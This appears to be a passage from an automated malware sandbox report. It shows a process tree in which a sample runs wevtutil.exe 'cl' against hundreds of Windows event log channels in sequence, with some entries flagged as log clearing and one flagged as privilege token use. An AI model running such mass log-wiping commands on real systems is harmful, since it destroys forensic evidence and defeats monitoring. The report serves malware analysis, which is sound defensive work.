C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CloudStore/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CloudStore/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Analytic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Containers-BindFlt/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Containers-BindFlt/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CoreApplication/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CoreApplication/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CoreApplication/Tracing"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Debug"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CoreWindow/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CoreWindow/Debug"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crashdump/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-BCRYPT/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-CNG/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/BackUpKeySvc"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Debug"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-DSSEnh/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-NCrypt/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-RSAEnh/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DAL-Provider/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DAL-Provider/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DAMM/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DDisplay/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DDisplay/Logging"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DLNA-Namespace/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DSC/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DSC/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DSC/Debug"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DSC/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DXGI/Logging"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DXP/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Data-Pdf/Debug"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/CrashRecovery"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Deduplication/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Deduplication/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Deduplication/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Deduplication/Scrubbing"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Defrag-Core/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DesktopActivityModerator/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DesktopWindowManager-Diag/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceAssociationService/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceConfidence/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceGuard/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceGuard/Verbose"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Analytic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceUpdateAgent/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Devices-Background/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-AdvancedTaskManager/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D12/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D12/Logging"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D12/PerfTiming"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D9/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3DShaderCache/Default"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DirectComposition/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DirectManipulation/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Disk/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dism-Api/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dism-Api/ExternalAnalytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dism-Api/InternalAnalytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dism-Cli/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Documents/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dot3MM/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DucUpdateAgent/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dwm-API/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dwm-Core/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dwm-Dwm/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dwm-Redir/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dwm-Udwm/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DxgKrnl-Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DxgKrnl-Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DxgKrnl/Contention"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DxgKrnl/Power"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EDP-Application-Learning/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EDP-Audit-Regular/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EDP-Audit-TCB/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EFS/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ESE/IODiagnose"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ESE/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EapHost/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EapHost/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EapMethods-RasChap/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EapMethods-RasTls/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EapMethods-Sim/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EapMethods-Ttls/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Energy-Estimation-Engine/EventLog"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Energy-Estimation-Engine/Trace"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EnhancedStorage-EhStorTcgDrv/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventLog/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FMS/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FMS/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FMS/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FeatureConfiguration/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FeatureConfiguration/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FileHistory-Catalog/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FileHistory-Catalog/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FileHistory-ConfigManager/Analytic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FileHistory-ConfigManager/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FileHistory-Core/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FileHistory-Core/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FileHistory-Core/WHC"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FileHistory-Engine/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FileHistory-Engine/BackupLog"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FileHistory-Engine/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FileHistory-EventListener/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FileHistory-EventListener/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FileHistory-Service/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FileHistory-Service/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FileHistory-UI-Events/Analytic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FileHistory-UI-Events/Debug"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-GPIO-ClassExtension/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-GenericRoaming/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HAL/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HelloForBusiness/Operational"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Help/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HotspotAuth/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HotspotAuth/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HttpService/Log"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HttpService/Trace"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Admin"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Diagnose"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Hyper-V-Hypervisor-Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Hyper-V-Hypervisor-Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Hyper-V-Hypervisor-Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Hyper-V-NETVSC/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Hyper-V-VID-Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Hyper-V-VID-Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IE-SmartScreen"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IKE/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IME-Broker/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IME-CandidateUI/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IME-CustomerFeedbackManager/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IME-CustomerFeedbackManagerUI/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IME-JPAPI/Analytic"3⤵
-
